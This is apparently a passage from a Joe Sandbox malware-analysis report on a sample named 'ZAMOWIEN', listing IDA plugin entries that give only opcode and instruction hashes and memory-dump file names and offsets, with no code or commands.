                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9c3195ba9f0c8d9ae10e407fb86557fc1e5c1c8e5933ae5ea7674d11166f514
                                                                            • Instruction ID: 890761af850422c1a5ccf43519104bf65393a3bc59642649c5e8e91a5d885e7c
                                                                            • Opcode Fuzzy Hash: c9c3195ba9f0c8d9ae10e407fb86557fc1e5c1c8e5933ae5ea7674d11166f514
                                                                            • Instruction Fuzzy Hash: 7390043D311404070105F55C5F04507004747D5351355C433F1015510CDFF1CD7D5133
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d99c660f8606c4ec04e9c5a5267fccb12f5a5919e790068ea96744be164015e0
                                                                            • Instruction ID: 02989f1b73bd585712669dfbe69e63ec206a18f23bf42ef23add2fc92e33ae35
                                                                            • Opcode Fuzzy Hash: d99c660f8606c4ec04e9c5a5267fccb12f5a5919e790068ea96744be164015e0
                                                                            • Instruction Fuzzy Hash: B5900229221404070145F5585B0450B044557D6351395C417F1416550CCAA1897D5322
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb2c5d93ad5d7ea135688231c82db38d5c452ad9b1750b3e5994120cbcd6b73e
                                                                            • Instruction ID: 3d4cc19bff6f96462b68ab416e11df538c30c72b54423b962e5d361873a18458
                                                                            • Opcode Fuzzy Hash: eb2c5d93ad5d7ea135688231c82db38d5c452ad9b1750b3e5994120cbcd6b73e
                                                                            • Instruction Fuzzy Hash: 4790023520140C07D104B1589D04686000547D0301F55C413A6024615E9AE589A97132
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 77b8e453d4ece6d3fdb3bc8cdf94b71453e7ef36e838f8c863dc12cfa37bac78
                                                                            • Instruction ID: 29336bd196d6a2d2caac9f6018a9626ee5d2bde9be51f873de8e6b05a082915f
                                                                            • Opcode Fuzzy Hash: 77b8e453d4ece6d3fdb3bc8cdf94b71453e7ef36e838f8c863dc12cfa37bac78
                                                                            • Instruction Fuzzy Hash: AE90023560540C07D150B1589914746000547D0301F55C413A0024614D8BD58B6D76A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 335199052d994f837ef5354a660e8654b0c885e8c89fe6cbf8be77b1aa35d777
                                                                            • Instruction ID: f34c183e4f22428477e4fdab6dda9f076b2b30f5fd557acafc5d396b90bee292
                                                                            • Opcode Fuzzy Hash: 335199052d994f837ef5354a660e8654b0c885e8c89fe6cbf8be77b1aa35d777
                                                                            • Instruction Fuzzy Hash: 0590023520544C47D140B1589904A46001547D0305F55C413A0064654D9AA58E6DB662
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4903cd86836a1a5b492856814aa11345c49c478e772c31e02ca3966461957514
                                                                            • Instruction ID: 444e62e33c3c9b785ded17cfdececbce8b51e36022239b90205af3afb6e8ad2a
                                                                            • Opcode Fuzzy Hash: 4903cd86836a1a5b492856814aa11345c49c478e772c31e02ca3966461957514
                                                                            • Instruction Fuzzy Hash: 8690023520140C07D180B158990464A000547D1301F95C417A0025614DCE958B6D77A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1038070e726316b3a922d97a883fc9af22bacc082f6839c61821c26e95b5e770
                                                                            • Instruction ID: b1588e11b2b05cf4e6e2f8b615aea67197700857359f9764dc8557a77b08457b
                                                                            • Opcode Fuzzy Hash: 1038070e726316b3a922d97a883fc9af22bacc082f6839c61821c26e95b5e770
                                                                            • Instruction Fuzzy Hash: 2B90022560140907D101B1589904616000A47D0341F95C423A1024515ECEA58AAAA132
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d12c1a05cb50345859f2b9f64b58099451b1d82328bfc4f9b56d4fda6588c218
                                                                            • Instruction ID: 59787613836f6a470a31d17d533fae7d42e76c533930ca63e95c35997efb93aa
                                                                            • Opcode Fuzzy Hash: d12c1a05cb50345859f2b9f64b58099451b1d82328bfc4f9b56d4fda6588c218
                                                                            • Instruction Fuzzy Hash: 3F90027520140807D140B1589904746000547D0301F55C413A5064514E8AD98EED6666
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53eb7007f21c33e77fbffc93d858ba770dfabfd3236057eed0b8b51d9188ee89
                                                                            • Instruction ID: dfa8b499e76850f3254bc9f68c11a3d953841946afa1c1b81f215719fd496178
                                                                            • Opcode Fuzzy Hash: 53eb7007f21c33e77fbffc93d858ba770dfabfd3236057eed0b8b51d9188ee89
                                                                            • Instruction Fuzzy Hash: AC90026520180807D140B5589D04607000547D0302F55C413A2064515E8EA98D696136
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b50c5aa16d5cbc67d00b8ebbfd03336a7377a5bdb93a4e680546b4250496fdd9
                                                                            • Instruction ID: 339121be68b2891c0b5abf41c2777923ea8adf113eb826214c93cedc38f46faf
                                                                            • Opcode Fuzzy Hash: b50c5aa16d5cbc67d00b8ebbfd03336a7377a5bdb93a4e680546b4250496fdd9
                                                                            • Instruction Fuzzy Hash: 9490022530140807D102B1589914606000987D1345F95C413E1424515D8AA58A6BA133
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58a4d616188479b1aa281323d4b7a5841cb48d886b377e669bce5d7c46a669cc
                                                                            • Instruction ID: 1661269e6258b164afb0732cd1b6c377f6a4b5f82d483db468e1d0883413671e
                                                                            • Opcode Fuzzy Hash: 58a4d616188479b1aa281323d4b7a5841cb48d886b377e669bce5d7c46a669cc
                                                                            • Instruction Fuzzy Hash: 3090023520180807D100B1589D1470B000547D0302F55C413A1164515D8AA589696572
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 95b0c99d57ae4e77093882a067c74b9809cdf8a0b31e2c2d9355ac67ad9dfcdd
                                                                            • Instruction ID: a9c3a471eea7012494820e0188864d27e773cf95148cb69072bedcf43a838f13
                                                                            • Opcode Fuzzy Hash: 95b0c99d57ae4e77093882a067c74b9809cdf8a0b31e2c2d9355ac67ad9dfcdd
                                                                            • Instruction Fuzzy Hash: 6290023520180807D100B1589D08747000547D0302F55C413A5164515E8AE5C9A96532
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ee5eca9ea50608ce2808caa5f667e373d039c62166898ac8f01b2763359a64e
                                                                            • Instruction ID: e6b0309ccfe558f0898b7b4f0de1c980a427a8d14ec13c35d41ecfb93861eadb
                                                                            • Opcode Fuzzy Hash: 5ee5eca9ea50608ce2808caa5f667e373d039c62166898ac8f01b2763359a64e
                                                                            • Instruction Fuzzy Hash: 1D900225601404474140B168DD4490640056BE1311755C523A0998510D89D9897D5666
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27cb91c1f213d800ba7977adeb435d337735cbe757e8c72af41cb073164cd9b9
                                                                            • Instruction ID: 059d7b7470fe90a1e0ff316efbf5fccccb06a5d7a5714e6e4d39ecf588350620
                                                                            • Opcode Fuzzy Hash: 27cb91c1f213d800ba7977adeb435d337735cbe757e8c72af41cb073164cd9b9
                                                                            • Instruction Fuzzy Hash: F4900225211C0447D200B5689D14B07000547D0303F55C517A0154514CCD9589795522
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7d91df24e70b759323db58879f88d165dfbe232ffd0e42b83c6f098ab81408f
                                                                            • Instruction ID: 20c2260f30f737d5ba220b2a3a02e2b12030699f8150d81cf32c5e2d5e4b526a
                                                                            • Opcode Fuzzy Hash: d7d91df24e70b759323db58879f88d165dfbe232ffd0e42b83c6f098ab81408f
                                                                            • Instruction Fuzzy Hash: 5E90026534140847D100B1589914B06000587E1301F55C417E1064514D8A99CD6A6127
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 075c4a1c3d5e547201c6655e7ca414fe18ba87d68dff7c48480597ab25e26237
                                                                            • Instruction ID: 90852a5da9e1f86b98e1b2277c10c4e259b3604c82cd0597b27189b96e3e2405
                                                                            • Opcode Fuzzy Hash: 075c4a1c3d5e547201c6655e7ca414fe18ba87d68dff7c48480597ab25e26237
                                                                            • Instruction Fuzzy Hash: F790026521140447D104B1589904706004547E1301F55C413A2154514CC9A98D795126
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dd06c8db2db102fdbdb4cd2a97a424ed57078014f9b6b98f118c04817490fdc
                                                                            • Instruction ID: 9c3c76b9f68c9b8901c4696ce3c6c2cbae97747cc336c498298982c824a82921
                                                                            • Opcode Fuzzy Hash: 6dd06c8db2db102fdbdb4cd2a97a424ed57078014f9b6b98f118c04817490fdc
                                                                            • Instruction Fuzzy Hash: 4490023520140807D100B598A908646000547E0301F55D413A5024515ECAE589A96132
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c0fdc7443e9ec63e2f1f4e284b8eb5e0e54887b32e14cfb8c07e96cd3c8fb997
                                                                            • Instruction ID: 629383e0c23994812303f1cbc1d1a432810ffd6e66652dbb4213429337537b5c
                                                                            • Opcode Fuzzy Hash: c0fdc7443e9ec63e2f1f4e284b8eb5e0e54887b32e14cfb8c07e96cd3c8fb997
                                                                            • Instruction Fuzzy Hash: FF90022560540807D140B158A918706001547D0301F55D413A0024514DCAD98B6D66A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83601d6b4d0cdc835632f715aecc60304a86a8209da5459fafc48bb881efa8dc
                                                                            • Instruction ID: 792cff589fe871a738667a9b9734756fbe11c6b3c8c82a3768702212a09777b2
                                                                            • Opcode Fuzzy Hash: 83601d6b4d0cdc835632f715aecc60304a86a8209da5459fafc48bb881efa8dc
                                                                            • Instruction Fuzzy Hash: 8290023520140807D100B158AA08707000547D0301F55D813A0424518DDAD689696122
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b4e755eca758d699aa38bdbd273883b759c081edfc18248bb5025490829afbb4
                                                                            • Instruction ID: 43cc793baac23afef3a01deb848d3ff08bc53ce8373c4414cb4ddf392f4fb019
                                                                            • Opcode Fuzzy Hash: b4e755eca758d699aa38bdbd273883b759c081edfc18248bb5025490829afbb4
                                                                            • Instruction Fuzzy Hash: 1490023520140C47D100B1589904B46000547E0301F55C417A0124614D8A95C9697522
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e00797187f273d21c57a07a557931c1068c83116699f1282401f254a768d856
                                                                            • Instruction ID: 96a15b575b53622435e700ca837802fd72efaddc37d40e683046390a9ec66e9f
                                                                            • Opcode Fuzzy Hash: 8e00797187f273d21c57a07a557931c1068c83116699f1282401f254a768d856
                                                                            • Instruction Fuzzy Hash: 4190023524140807D141B1589904606000957D0341F95C413A0424514E8AD58B6EAA62
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17a23308fdf30db87c5428c72a15cf75f37aa5e76608306fb7daa9321afccc50
                                                                            • Instruction ID: 4a0079af54c51d19791f14876cb65557349f708b9d1f50e8672ff3c98f34fc3d
                                                                            • Opcode Fuzzy Hash: 17a23308fdf30db87c5428c72a15cf75f37aa5e76608306fb7daa9321afccc50
                                                                            • Instruction Fuzzy Hash: CC900225242445575545F1589904507400657E0341795C413A1414910C89A6996ED622
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25b57e9d1700945eb77367b4de50f94780792116ad20e048f65c93d9b3eaec1a
                                                                            • Instruction ID: 925f36857d242c5ad4192b60ffd524f646a8403841b5805f2301917b308e3051
                                                                            • Opcode Fuzzy Hash: 25b57e9d1700945eb77367b4de50f94780792116ad20e048f65c93d9b3eaec1a
                                                                            • Instruction Fuzzy Hash: 6A90022520544847D100B558A908A06000547D0305F55D413A1064555DCAB58969A132
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b024ef957e33b864b04e71ff14e9db638a79bcdcde06cfa90d9b4ac7b962039f
                                                                            • Instruction ID: 232888b471df676d15370d0b7c0cf3f468d9f466c6abef41e4f094c3f76c338c
                                                                            • Opcode Fuzzy Hash: b024ef957e33b864b04e71ff14e9db638a79bcdcde06cfa90d9b4ac7b962039f
                                                                            • Instruction Fuzzy Hash: 6590022D21340407D180B158A90860A000547D1302F95D817A0015518CCD95897D5322
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b9bfe778918112273812706aff05d64e4757c38180968196a512d8da8d431e4
                                                                            • Instruction ID: e360f36dd39e80eea5c8302956777fcdd0551ef37e96b3bde4eb5b464c4eb914
                                                                            • Opcode Fuzzy Hash: 4b9bfe778918112273812706aff05d64e4757c38180968196a512d8da8d431e4
                                                                            • Instruction Fuzzy Hash: 2C90022530140407D140B158A918606400597E1301F55D413E0414514CDD95896E5223
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
